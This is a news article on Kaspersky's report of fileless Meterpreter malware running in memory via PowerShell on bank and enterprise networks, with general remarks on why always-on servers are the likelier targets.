Usually, malware is loaded from a computer’s hard drive when it starts up. Security software can provide protection by periodically scanning connected drives for previously identified threats. Researchers can begin more detailed investigations by looking for suspect files.
Undetectable malware
Fileless malware is stored entirely in a computer’s working memory. Because it doesn’t use the filesystem, it’s virtually undetectable. It can run for months without anyone noticing, injecting itself into RAM and remaining active until the computer’s shutdown.
While highly successful, the complexities of the approach have so far prevented it seeing significant use. However, the technique is now becoming more mainstream, security researchers from Kaspersky Labs reported today. The company has found a form of fileless malware called Meterpreter in 140 networks across 40 countries. The affected systems are predominantly owned by banks and enterprises.
Hijacking system tools
Meterpreter goes the extra mile in covering its tracks. It injects itself into the target’s memory by using genuine system administration tools. Kaspersky discovered it frequently uses malicious Windows PowerShell scripts to hijack machines. The scripts assign memory to Meterpreter and then download the malware straight into RAM.
Kaspersky only discovered Meterpreter in late 2016. It was contacted by a bank after its security team found Meterpreter actively running inside Windows’ domain controller, a legitimate part of the operating system. Kaspersky stepped in to complete a forensic investigation, ascertaining that the program was completely fileless.
The company successfully restored a copy of the utility from memory by analysing error dumps from the infected machines. It determined the contents of the malicious PowerShell scripts too, enabling it to piece together how the attack runs to completion. It’s still unclear how the PowerShell scripts were delivered to the machines.
Fileless malware heads to the wild
Meterpreter is concerning because it’s the first time fileless malware has been used to successfully orchestra large-scale cyberattacks on major organisations. The hackers behind the malware were using it to force money out of banks, installing the malware on computers operating automatic teller machines.
Less than two years ago, security firm Trend Micro reported that fileless malware had been spotted in the wild for the first time. It warned that more malware creators would be adopting the technique soon. According to Kaspersky, that’s now very much the case. It said incidents of fileless attacks are rising as the technique becomes more widespread.
“Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry,” the company said. “Unfortunately the use of common tools combined with different tricks makes detection very hard. In fact, detection of this attack would be possible in RAM, network and registry only.”
Consumer impact
Fileless malware is less likely to be such a significant concern on desktop PCs. RAM is volatile storage so its contents are deleted each time you reboot. Because PCs are typically rebooted on a daily basis, fileless attacks are less likely to be a success when targeting home users.
However, servers running corporate networks are designed for continuous operation, rebooting only if a fault is encountered. The malware can expect to persist in RAM indefinitely, safe in the knowledge it’s almost completely invisible to the outside world. These attacks are therefore likely to concentrate on enterprise systems for the foreseeable future. Fileless invasions of always-on mobile devices and IoT products are also a possibility.
